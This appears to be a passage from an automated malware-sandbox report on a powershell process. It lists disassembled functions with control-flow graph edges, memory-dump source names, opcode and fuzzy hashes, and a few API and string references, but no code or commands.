                                          control_flow_graph 1743 6263409-6263498 1749 626349f-62634d9 1743->1749 1750 626349a 1743->1750 1755 62634f5-62634fc 1749->1755 1756 62634db-62634ee 1749->1756 1750->1749 1757 62634fe-6263501 1755->1757 1758 6263508-626350e 1755->1758 1756->1755 1757->1758 1801 6263511 call 6263a00 1758->1801 1802 6263511 call 6263a10 1758->1802 1760 6263517-626353c 1763 6263545-6263576 1760->1763 1764 626353e 1760->1764 1768 626357f-626364d 1763->1768 1769 6263578 1763->1769 1764->1763 1784 6263672-6263677 1768->1784 1785 626364f-6263655 1768->1785 1769->1768 1790 6263681-6263687 1784->1790 1786 62637ea-62637f4 1785->1786 1787 626365b-626366b 1785->1787 1788 62637f6-6263805 1786->1788 1789 626380d-6263814 1786->1789 1794 626366d 1787->1794 1788->1789 1792 6263816-6263830 1789->1792 1793 6263838-6263853 1789->1793 1795 626368e 1790->1795 1792->1793 1798 6263855 1793->1798 1799 626385d 1793->1799 1794->1786 1795->1786 1798->1799 1800 626385e 1799->1800 1800->1800 1801->1760 1802->1760
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000026.00000002.457457096.0000000006260000.00000040.00000800.00020000.00000000.sdmp, Offset: 06260000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_38_2_6260000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: Hr0k$Hr0k$Hr0k$Hr0k$Hr0k$Hr0k
                                          • API String ID: 0-2721006579
                                          • Opcode ID: 9bf75116dc5fe1bd8e9de9e1b4395e318a1a541e81a143f1b435f0698494b6a1
                                          • Instruction ID: c4d5781c5a0d638ac7a5da30bd38be74e60e4f735dcecacb212000b54de88011
                                          • Opcode Fuzzy Hash: 9bf75116dc5fe1bd8e9de9e1b4395e318a1a541e81a143f1b435f0698494b6a1
                                          • Instruction Fuzzy Hash: 2B918034A102099FC744DF69C490AADBBF2EF89314F04C968E8199B751CB71ED86CF90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0626E978 Relevance: 1.6, Strings: 1, Instructions: 333COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 1821 626e978-626e9aa 1823 626e9ac-626e9b5 1821->1823 1824 626e9b8-626ea14 call 626db20 1821->1824 1834 626ea16-626ea64 1824->1834 1835 626ea6c-626ea92 1824->1835 1834->1835 1842 626eb5b-626eb73 1835->1842 1843 626ea98-626eaf9 1835->1843 1850 626eb75 1842->1850 1851 626ebaa-626ebbb 1842->1851 1867 626eb11-626eb1f 1843->1867 1868 626eafb-626eb01 1843->1868 1855 626eb7a-626eba8 1850->1855 1857 626ebd5-626ebdf 1851->1857 1855->1857 1860 626ebe1-626ebf6 call 6265ea0 1857->1860 1861 626ebfe-626ec05 1857->1861 1860->1861 1862 626ec26-626ec3c 1861->1862 1863 626ec07-626ec1e 1861->1863 1875 626ec3e-626ec44 1862->1875 1876 626ec4a-626ec4c 1862->1876 1863->1862 1867->1842 1880 626eb21-626eb53 1867->1880 1872 626eb05-626eb0f 1868->1872 1873 626eb03 1868->1873 1872->1867 1873->1867 1882 626ec46 1875->1882 1883 626ec48 1875->1883 1884 626ec62-626ec83 1876->1884 1885 626ec4e-626ec5a 1876->1885 1880->1842 1882->1876 1883->1876 1893 626ec89-626eca3 1884->1893 1885->1884 1897 626eca5-626ecaf 1893->1897 1898 626ecb2-626ece5 1893->1898 1903 626edab-626edb5 1898->1903 1904 626eceb-626ed41 1898->1904 1909 626ed43-626ed47 1904->1909 1910 626ed7b-626ed83 1904->1910 1909->1903 1913 626ed49-626ed51 1909->1913 1911 626ed85-626ed8b 1910->1911 1912 626ed9b-626eda3 1910->1912 1914 626ed8f-626ed99 1911->1914 1915 626ed8d 1911->1915 1912->1903 1916 626ed53-626ed59 1913->1916 1917 626ed69-626ed79 1913->1917 1914->1912 1915->1912 1918 626ed5d-626ed67 1916->1918 1919 626ed5b 1916->1919 1917->1903 1918->1917 1919->1917
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000026.00000002.457457096.0000000006260000.00000040.00000800.00020000.00000000.sdmp, Offset: 06260000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_38_2_6260000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID: 0-3916222277
                                          • Opcode ID: 47ba15e17b3e93423e9d1abf32c3d691c1605d30ff09d6258c44d41876287445
                                          • Instruction ID: 4fcfc2f65dd250a957bf5e7d73622d6122443d5035f1376b3a52765a5816a325
                                          • Opcode Fuzzy Hash: 47ba15e17b3e93423e9d1abf32c3d691c1605d30ff09d6258c44d41876287445
                                          • Instruction Fuzzy Hash: 9BE12F38A10209CFCB54DFA9C49499DB7F2FF88314B1589A9E8069B365DB70ED46CB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 02E43FEC Relevance: 1.6, APIs: 1, Instructions: 56COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 1923 2e43fec-2e456a2 1926 2e456a4-2e456a7 1923->1926 1927 2e456aa-2e456d5 GetFileAttributesW 1923->1927 1926->1927 1928 2e456d7-2e456dd 1927->1928 1929 2e456de-2e456fb 1927->1929 1928->1929
                                          APIs
                                          • GetFileAttributesW.KERNELBASE(00000000), ref: 02E456C8
                                          Memory Dump Source
                                          • Source File: 00000026.00000002.442876524.0000000002E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E40000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_38_2_2e40000_powershell.jbxd
                                          Similarity
                                          • API ID: AttributesFile
                                          • String ID:
                                          • API String ID: 3188754299-0
                                          • Opcode ID: c02c5fd9583ad30aa67d8d1b919ab18cbe416cb52aede10f6ec2e8d5fff088f0
                                          • Instruction ID: 668febf1aa13cec84a6f67e50049c3817af2c89fd984feb40e181a959c01c58a
                                          • Opcode Fuzzy Hash: c02c5fd9583ad30aa67d8d1b919ab18cbe416cb52aede10f6ec2e8d5fff088f0
                                          • Instruction Fuzzy Hash: 242124B1D006199BCB10CF99E4447EEFBB4EB48214F10855AD819A3B00D774A904CFE5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 02E45650 Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 1932 2e45650-2e456a2 1935 2e456a4-2e456a7 1932->1935 1936 2e456aa-2e456d5 GetFileAttributesW 1932->1936 1935->1936 1937 2e456d7-2e456dd 1936->1937 1938 2e456de-2e456fb 1936->1938 1937->1938
                                          APIs
                                          • GetFileAttributesW.KERNELBASE(00000000), ref: 02E456C8
                                          Memory Dump Source
                                          • Source File: 00000026.00000002.442876524.0000000002E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E40000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_38_2_2e40000_powershell.jbxd
                                          Similarity
                                          • API ID: AttributesFile
                                          • String ID:
                                          • API String ID: 3188754299-0
                                          • Opcode ID: 96656ff2fa19255658339ae5f3d0a68cc0c695a9294ac29d9955c4aeeb07c77a
                                          • Instruction ID: 1b6a2bd8f44a9cedad3c1058d83cba756d27b4687dbb541a78cd7d2651bfa4c8
                                          • Opcode Fuzzy Hash: 96656ff2fa19255658339ae5f3d0a68cc0c695a9294ac29d9955c4aeeb07c77a
                                          • Instruction Fuzzy Hash: 841167B1D002199BCB00CFAAE4457DEFBB4FB48314F10855AD818B3B00D734AA55CFA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 06263A10 Relevance: 1.4, Strings: 1, Instructions: 148COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 1941 6263a10-6263a4f 1943 6263a51-6263a62 1941->1943 1944 6263a6c-6263a8d 1941->1944 1943->1944 1948 6263a93-6263aa2 1944->1948 1949 6263bcf-6263be2 1944->1949 1954 6263aa4-6263ab7 1948->1954 1955 6263ac1-6263ad2 1948->1955 1950 6263bec-6263bf0 1949->1950 1951 6263bf2 1950->1951 1952 6263bfb 1950->1952 1951->1952 1956 6263bfc 1952->1956 1954->1955 1982 6263ad4 call 6263c50 1955->1982 1983 6263ad4 call 6263c3e 1955->1983 1956->1956 1957 6263ada-6263ae5 1959 6263ae7-6263aeb 1957->1959 1960 6263af1-6263af5 1957->1960 1959->1960 1961 6263b9b-6263b9f 1959->1961 1962 6263af7-6263b41 1960->1962 1963 6263b44-6263b49 1960->1963 1964 6263ba1-6263bb4 1961->1964 1965 6263bbe-6263bc9 1961->1965 1962->1963 1966 6263b57 1963->1966 1967 6263b4b-6263b55 1963->1967 1964->1965 1965->1948 1965->1949 1968 6263b5c-6263b5e 1966->1968 1967->1968 1971 6263b60-6263b7b 1968->1971 1972 6263b7d-6263b84 1968->1972 1971->1972 1974 6263be4 1971->1974 1973 6263b86-6263b93 1972->1973 1972->1974 1973->1961 1974->1950 1982->1957 1983->1957
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000026.00000002.457457096.0000000006260000.00000040.00000800.00020000.00000000.sdmp, Offset: 06260000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_38_2_6260000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: pi0k
                                          • API String ID: 0-140181772
                                          • Opcode ID: 45d93d429fc8d91fca0e78a658858553b2670f4584ec58af597b00decb0ab87e
                                          • Instruction ID: 232c908523c628e77ab5c88f6d767bc14513d9a2517539b1ed38e3c45877d15f
                                          • Opcode Fuzzy Hash: 45d93d429fc8d91fca0e78a658858553b2670f4584ec58af597b00decb0ab87e
                                          • Instruction Fuzzy Hash: BE515B74A206059FDB54DF75D498BADBBF2BF88304F109469E806AB3A0DB74EC85CB50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 06263A00 Relevance: 1.4, Strings: 1, Instructions: 147COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 1984 6263a00-6263a4f 1987 6263a51-6263a62 1984->1987 1988 6263a6c-6263a8d 1984->1988 1987->1988 1992 6263a93-6263aa2 1988->1992 1993 6263bcf-6263be2 1988->1993 1998 6263aa4-6263ab7 1992->1998 1999 6263ac1-6263ad2 1992->1999 1994 6263bec-6263bf0 1993->1994 1995 6263bf2 1994->1995 1996 6263bfb 1994->1996 1995->1996 2000 6263bfc 1996->2000 1998->1999 2026 6263ad4 call 6263c50 1999->2026 2027 6263ad4 call 6263c3e 1999->2027 2000->2000 2001 6263ada-6263ae5 2003 6263ae7-6263aeb 2001->2003 2004 6263af1-6263af5 2001->2004 2003->2004 2005 6263b9b-6263b9f 2003->2005 2006 6263af7-6263b41 2004->2006 2007 6263b44-6263b49 2004->2007 2008 6263ba1-6263bb4 2005->2008 2009 6263bbe-6263bc9 2005->2009 2006->2007 2010 6263b57 2007->2010 2011 6263b4b-6263b55 2007->2011 2008->2009 2009->1992 2009->1993 2012 6263b5c-6263b5e 2010->2012 2011->2012 2015 6263b60-6263b7b 2012->2015 2016 6263b7d-6263b84 2012->2016 2015->2016 2018 6263be4 2015->2018 2017 6263b86-6263b93 2016->2017 2016->2018 2017->2005 2018->1994 2026->2001 2027->2001
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000026.00000002.457457096.0000000006260000.00000040.00000800.00020000.00000000.sdmp, Offset: 06260000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_38_2_6260000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: pi0k
                                          • API String ID: 0-140181772
                                          • Opcode ID: 0bc855d5737a993cc51a6130c527c749826ff62da610255b2445a9ad8765dec2
                                          • Instruction ID: f2db7d29ffc318ede028ce2508157d3f0bccfa82444150c2f42bfc19ece0b46e
                                          • Opcode Fuzzy Hash: 0bc855d5737a993cc51a6130c527c749826ff62da610255b2445a9ad8765dec2
                                          • Instruction Fuzzy Hash: EE516B74A206059FDB54DF75D498BADBBF2BF88304F109469E806AB3A0DB35EC85CB50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 062687D0 Relevance: 1.3, Strings: 1, Instructions: 44COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000026.00000002.457457096.0000000006260000.00000040.00000800.00020000.00000000.sdmp, Offset: 06260000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_38_2_6260000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 3
                                          • API String ID: 0-1842515611
                                          • Opcode ID: 1bbbb1dd198941ae05533706521b8070c2c7fe1e91a55a8b2e22c0d6d46bf461
                                          • Instruction ID: 46aea7a145b6ed137cace92432317291814279c477a6a127b151ded431365052
                                          • Opcode Fuzzy Hash: 1bbbb1dd198941ae05533706521b8070c2c7fe1e91a55a8b2e22c0d6d46bf461
                                          • Instruction Fuzzy Hash: 2C01DD6090D7C09FD343DB78D82069D7FB29F43215F5985EAD84DCB2A2DA341E05DB22
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0627C960 Relevance: 1.1, Instructions: 1057COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000026.00000002.457549041.0000000006270000.00000040.00000800.00020000.00000000.sdmp, Offset: 06270000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_38_2_6270000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: ed4d7108e43e91b2382253f856b9882b6ec7f75832f4d4f29daca4b34146a67b
                                          • Instruction ID: 4224a7baa45cda4c339ebf598f54d5d3213f2efc2b81d85899d7b70ddf873edd
                                          • Opcode Fuzzy Hash: ed4d7108e43e91b2382253f856b9882b6ec7f75832f4d4f29daca4b34146a67b
                                          • Instruction Fuzzy Hash: 5B828379700308AFDB15AF64D8A4A7E3AB3EBC8354F504158EF069B394CF716E468B91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0627C970 Relevance: 1.1, Instructions: 1054COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000026.00000002.457549041.0000000006270000.00000040.00000800.00020000.00000000.sdmp, Offset: 06270000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_38_2_6270000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 9a3e72484d18a517eacb160f286fa7d3f2c6ef49a966fa4ec656d524ad91b3aa
                                          • Instruction ID: 7a8f175630822bc5f023de7fb4c833eb08b21176045dfd4649fb48efa8961fd5
                                          • Opcode Fuzzy Hash: 9a3e72484d18a517eacb160f286fa7d3f2c6ef49a966fa4ec656d524ad91b3aa
                                          • Instruction Fuzzy Hash: B1828379700308AFDB15AF64D8A4A7E3AB3EBC8354F504158EF069B394CF716E468B91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 062674B0 Relevance: .5, Instructions: 473COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000026.00000002.457457096.0000000006260000.00000040.00000800.00020000.00000000.sdmp, Offset: 06260000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_38_2_6260000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 6a50e28d2060e5a489e4b5977ccc5780e26af12736a0ee95acb9fa0bf6710b3d
                                          • Instruction ID: 3b861fc3d83daa004ea63ec3c20658c647c516773c4e599dccafe55030614f77
                                          • Opcode Fuzzy Hash: 6a50e28d2060e5a489e4b5977ccc5780e26af12736a0ee95acb9fa0bf6710b3d
                                          • Instruction Fuzzy Hash: EAF1E2307102059FDB059BB9D895ABE7BB7EFC8304F148869E905DB390DF789C4A8B91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 06266558 Relevance: .4, Instructions: 408COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000026.00000002.457457096.0000000006260000.00000040.00000800.00020000.00000000.sdmp, Offset: 06260000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_38_2_6260000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 06a79868473606e45f74fc2b01c3f3692468b2189b6fd33372b1220f3f18c4f7
                                          • Instruction ID: cc5248397b2c9cedd3f04d8fa00861a382a0cc28e226bab7448e05c9b661a81d
                                          • Opcode Fuzzy Hash: 06a79868473606e45f74fc2b01c3f3692468b2189b6fd33372b1220f3f18c4f7
                                          • Instruction Fuzzy Hash: 64F1B234A102059FDB049FA5D8A5BAE7BB3EF84304F104869E906AB794CF759C47CF90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0626F3E8 Relevance: .4, Instructions: 370COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000026.00000002.457457096.0000000006260000.00000040.00000800.00020000.00000000.sdmp, Offset: 06260000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_38_2_6260000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: e0d19cc5e7714e4149efe78f21eab828167aff112c3fb5c75d8e252b51464f7a
                                          • Instruction ID: 772045af41302b6732d66f6c66e7a4a8d0dd20d1a3d506026bc0dfdeba5b9df6
                                          • Opcode Fuzzy Hash: e0d19cc5e7714e4149efe78f21eab828167aff112c3fb5c75d8e252b51464f7a
                                          • Instruction Fuzzy Hash: 89E1B134E102099FCB04DFA5D594AAEBBF3EF89304F148469E805AB795DB70ED46CB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 062779F6 Relevance: .3, Instructions: 344COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000026.00000002.457549041.0000000006270000.00000040.00000800.00020000.00000000.sdmp, Offset: 06270000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_38_2_6270000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 33ca8bfae7a30cbe46e805d2148a9430e4ba28e7c21edb8220077e34ae0d65f0
                                          • Instruction ID: 3fe034290d46261509f2eccd3c91ccf6472662296b6d36e6673056a44d0e65d4
                                          • Opcode Fuzzy Hash: 33ca8bfae7a30cbe46e805d2148a9430e4ba28e7c21edb8220077e34ae0d65f0
                                          • Instruction Fuzzy Hash: 87E15035A1021ACFDB64DF74C550BAEB7F2AF89304F1085A9D909AB350DB70AD86CF50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0626C510 Relevance: .3, Instructions: 331COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000026.00000002.457457096.0000000006260000.00000040.00000800.00020000.00000000.sdmp, Offset: 06260000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_38_2_6260000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: d3ef3410d659c376a30d89c2b981a1effac2d27e1da0d8fdbbbb73e9b8f92df9
                                          • Instruction ID: d824ffddb64e5c66fd554edf983e5ffca1d80b33c5430ea39a886c1c2de58e94
                                          • Opcode Fuzzy Hash: d3ef3410d659c376a30d89c2b981a1effac2d27e1da0d8fdbbbb73e9b8f92df9
                                          • Instruction Fuzzy Hash: 0DD1D370710208AFD744EB78D8966AE7BE3EF84308F10866DD50A9B391DF75AD468BD0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 06260827 Relevance: .3, Instructions: 329COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000026.00000002.457457096.0000000006260000.00000040.00000800.00020000.00000000.sdmp, Offset: 06260000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_38_2_6260000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 179e0c97c345a36c6645388a49e92081ace28486b83c6a29276132eed0affa9f
                                          • Instruction ID: fb708ba004c127b75389a81c4c2ba92f23182a9e28a6cee68a4ba0bc850e3744
                                          • Opcode Fuzzy Hash: 179e0c97c345a36c6645388a49e92081ace28486b83c6a29276132eed0affa9f
                                          • Instruction Fuzzy Hash: 270128725143045BC321F7EAECA5AEA3BA6EF86324B440876E40686612DF205C4BD7E2
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0626C500 Relevance: .3, Instructions: 313COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000026.00000002.457457096.0000000006260000.00000040.00000800.00020000.00000000.sdmp, Offset: 06260000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_38_2_6260000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 67ff35ab5a343436da83efead03193bf786cfb6990e76260fadcb5e335f70ae8
                                          • Instruction ID: 6e2b5d46aa077deef17f13d34d76c568b8264061a361700c2006dd8d0a816c36
                                          • Opcode Fuzzy Hash: 67ff35ab5a343436da83efead03193bf786cfb6990e76260fadcb5e335f70ae8
                                          • Instruction Fuzzy Hash: 0CC1D370710208AFD744EB78D8966AE7BE3EF84308B10866DD50ADB351DF75AD4A8BD0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0626CF88 Relevance: .3, Instructions: 309COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000026.00000002.457457096.0000000006260000.00000040.00000800.00020000.00000000.sdmp, Offset: 06260000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_38_2_6260000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: a1172044e35d8255b6417798370ff58dc3fa0a75740621a4e96d6807a2c89423
                                          • Instruction ID: b4e0aa2888cb9fdb54a7aa0753f2260e08e1ce203a339802fb55933951a16f73
                                          • Opcode Fuzzy Hash: a1172044e35d8255b6417798370ff58dc3fa0a75740621a4e96d6807a2c89423
                                          • Instruction Fuzzy Hash: 33C181347102099FCB40EF79D4A459EBBF3EF84308B108929D816DBBA5DB75AC46CB91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 06268A20 Relevance: .3, Instructions: 288COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000026.00000002.457457096.0000000006260000.00000040.00000800.00020000.00000000.sdmp, Offset: 06260000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_38_2_6260000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 95fef21da74534c82028a23017d0ad4da461b0246425cf8c61aa91709e36453f
                                          • Instruction ID: 68af2d86168c8749883c538c32b5c06cedc85bb47a996cd5877da7d17157a332
                                          • Opcode Fuzzy Hash: 95fef21da74534c82028a23017d0ad4da461b0246425cf8c61aa91709e36453f
                                          • Instruction Fuzzy Hash: 81B1C274B102159FDB14DB69C894ABEBBB6FF88310F14855AE915EB381CB34DC46CBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 06264C90 Relevance: .3, Instructions: 280COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000026.00000002.457457096.0000000006260000.00000040.00000800.00020000.00000000.sdmp, Offset: 06260000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_38_2_6260000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 36053087715d70e99fffa7ff4e46a1b77d28a33b940f753b298bdd23476250a9
                                          • Instruction ID: 16d624afce0fcf81d35ec03ae0aaf390b3a9e0ac4d86bf008c486ee5a7ced817
                                          • Opcode Fuzzy Hash: 36053087715d70e99fffa7ff4e46a1b77d28a33b940f753b298bdd23476250a9
                                          • Instruction Fuzzy Hash: 58C15B34A1024ACFDB55DFA5C494BAE7BF2BF88304F148469E845AB364DB74EC85CB80
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0626A700 Relevance: .3, Instructions: 279COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000026.00000002.457457096.0000000006260000.00000040.00000800.00020000.00000000.sdmp, Offset: 06260000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_38_2_6260000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 42e643148aa31084c0d6be7f9def38932596071e22d64a5f630daf765cb39a3c
                                          • Instruction ID: f0ea87f927f9364577e3cfceee09c35ffc3967eede9a404db1ea75fddc9e76b2
                                          • Opcode Fuzzy Hash: 42e643148aa31084c0d6be7f9def38932596071e22d64a5f630daf765cb39a3c
                                          • Instruction Fuzzy Hash: 1DA18F35B102059FCB04DBB9D459AAEBBB2FF88315B14846AE816E7350DF35DC46CBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0626CF67 Relevance: .3, Instructions: 278COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000026.00000002.457457096.0000000006260000.00000040.00000800.00020000.00000000.sdmp, Offset: 06260000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_38_2_6260000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: deb3760d802622761b4ea3119a5be81c707baac19ee7a43b7e92ee8550ee6fc2
                                          • Instruction ID: 88d26376d349010d8a854c56e474510ac83099c5f4a236d8e22719ca8c0da264
                                          • Opcode Fuzzy Hash: deb3760d802622761b4ea3119a5be81c707baac19ee7a43b7e92ee8550ee6fc2
                                          • Instruction Fuzzy Hash: 28C1A1306102099FD740EF79D4A46A9BBF2FF84308F108959D829DB7A5DB71AC46CF91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0626FC28 Relevance: .3, Instructions: 260COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000026.00000002.457457096.0000000006260000.00000040.00000800.00020000.00000000.sdmp, Offset: 06260000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_38_2_6260000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 1b007a4eacbf26319c8454a6a38c6bda6f5b56c7c93c4e5d6a774c80839e6718
                                          • Instruction ID: 8ee3245b04e13dcf4cf0a020fdb4d1930587dbe4c803658ea0058a5ecd2f5a3f
                                          • Opcode Fuzzy Hash: 1b007a4eacbf26319c8454a6a38c6bda6f5b56c7c93c4e5d6a774c80839e6718
                                          • Instruction Fuzzy Hash: 1791D1357002089FCB04DB79E4549AEBBE3EFC9314B10856AE80ADB791DB31AD45CB91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 062653D8 Relevance: .3, Instructions: 257COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000026.00000002.457457096.0000000006260000.00000040.00000800.00020000.00000000.sdmp, Offset: 06260000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_38_2_6260000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 03721299e9904059513b01bbf396feed63a19f053a3a8908751730d14ccc5c1e
                                          • Instruction ID: 7597ca2cff6c1bdcc25c93697c6e7ba0b63953e047c75e05e915156cd52610ad
                                          • Opcode Fuzzy Hash: 03721299e9904059513b01bbf396feed63a19f053a3a8908751730d14ccc5c1e
                                          • Instruction Fuzzy Hash: 01A13834A11205DFDB18DF65D498A6DBBB2EF88315B10846DE806AB3A0DF75EC82CF50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 06268F58 Relevance: .2, Instructions: 209COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000026.00000002.457457096.0000000006260000.00000040.00000800.00020000.00000000.sdmp, Offset: 06260000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_38_2_6260000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 12be06df58b1032e47f95acbd1ae53e9d5ae25957b337720424d6a3c046cbb6f
                                          • Instruction ID: 236bcec9042df39cc02ff9c404b3e1fff8be9d6b297337f5de094bd146881eb3
                                          • Opcode Fuzzy Hash: 12be06df58b1032e47f95acbd1ae53e9d5ae25957b337720424d6a3c046cbb6f
                                          • Instruction Fuzzy Hash: FF915D34E1024A9FDB05DFA4C454AAEBBF2EF89300F148469E805AF355DB75AD85CF90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 06265B70 Relevance: .2, Instructions: 209COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000026.00000002.457457096.0000000006260000.00000040.00000800.00020000.00000000.sdmp, Offset: 06260000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_38_2_6260000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
